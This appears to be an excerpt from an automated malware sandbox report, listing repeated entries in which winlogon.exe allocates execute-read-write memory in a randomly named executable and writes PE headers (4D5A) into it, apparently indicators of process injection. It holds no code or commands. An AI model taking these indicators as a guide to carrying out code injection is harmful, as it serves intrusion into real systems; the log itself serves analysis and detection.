        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2BE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 29A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 8A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: DD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 27E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2940000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: DE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 3010000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 7C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2880000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 3070000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2C90000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: C50000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: C30000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 27E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2A50000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: BD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 10D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2C30000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2D70000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: C70000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 1110000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: D20000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2A40000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2870000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 1030000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: C50000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 12E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: C60000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2660000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: BE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 29B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2F90000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 1380000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 15E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 15D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2360000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 21D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 800000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2BA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: DA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 800000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: F20000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2CF0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2E40000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 26B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 1320000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 1320000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: F70000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2D60000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 1540000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: D90000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: CC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 21F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: DC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: C20000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: AD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2B30000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: DC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: BC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 24A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: C10000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2CF0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 27E0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: E00000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2BE0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 29A0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 8A0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: DD0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 27E0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2940000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: DE0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 3010000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 7C0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2880000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 3070000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2C90000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: C50000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: C30000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 27E0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2A50000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: BD0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 10D0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2C30000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2D70000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: C70000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 1110000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: D20000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2A40000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2870000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 1030000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: C50000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 12E0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: C60000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2660000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: BE0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 29B0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2F90000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 1380000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 15E0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 15D0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2360000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 21D0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 800000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2BA0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: DA0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 800000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: F20000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2CF0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2E40000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 26B0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 1320000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 1320000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: F70000 value starts with: 4D5AJump to behavior
